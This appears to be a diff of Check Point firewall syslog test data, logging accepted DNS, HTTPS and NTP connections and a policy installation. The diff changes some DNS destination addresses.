 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2e,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"48"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"13.224.227.14"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48632"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2f,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"49"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38065"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2f,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"49"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38065"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x30,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"50"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.17.64.4"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49320"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x31,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"51"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.168.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38520"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x32,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38808"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x32,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38808"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"151.139.128.14"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50128"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44927"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44927"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58546"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37012"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45944"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37012"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45944"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48722"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d91c,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"52"; version:"5"; additional_info:"Access Control Policy : Standard"; administrator:"admin"; audit_status:"Success"; client_ip:"192.168.1.117"; machine:"192.168.1.117"; objectname:"gw-da58d3"; objecttable:"applications"; objecttype:"firewall_application"; operation:"Install Policy"; operation_number:"7"; product:"SmartConsole"; subject:"Policy Installation"; uid:"{FF0154DE-7D18-4396-B0C2-7E8951B393A4}"]
 <134>1 2020-03-29T17:21:32Z gw-da58d3 CheckPoint 8363 - [flags:"147456"; ifdir:"inbound"; logid:"134217728"; loguid:"{0x5e80d91c,0x0,0x6401a8c0,0x216}"; origin:"192.168.1.100"; sequencenum:"1"; version:"5"; additional_info:"Access Control Policy : Standard"; administrator:"admin"; cu_detected_by:"192.168.1.100"; cu_detection_time:"1585502492"; cu_last_update_time:"1585502492"; cu_log_count:"1"; cu_rule_category:"Informational"; cu_rule_id:"{58144F8B-A181-AB98-A857-2A8F6CFEA948}"; domain:"SMC User"; event_end_time:"1585502492"; event_name:"Policy installation"; event_start_time:"1585502492"; is_correlated:"1"; is_last:"1"; log_id:"2000"; machine:"3232235893"; max_num_count_detected:"1"; num_of_updates:"0"; objectname:"gw-da58d3"; origin_repetitions:"1"; origin_sic_name:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; product:"SmartConsole"; severity:"0"; source_repetitions:"1"; time_interval:"60"; users_repetitions:"1"]
 <134>1 2020-03-29T17:21:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d91d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57621"; service:"57621"; src:"192.168.1.94"]
-<134>1 2020-03-29T17:21:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d922,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502498"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56496"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d922,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502498"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56496"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d922,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"216.58.208.98"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40294"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:22:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43301"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:22:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d93d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:22:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39213"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:22:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50380"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:22:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"174.138.9.187"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53666"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:22:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502527"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53845"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:22:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502527"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53845"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
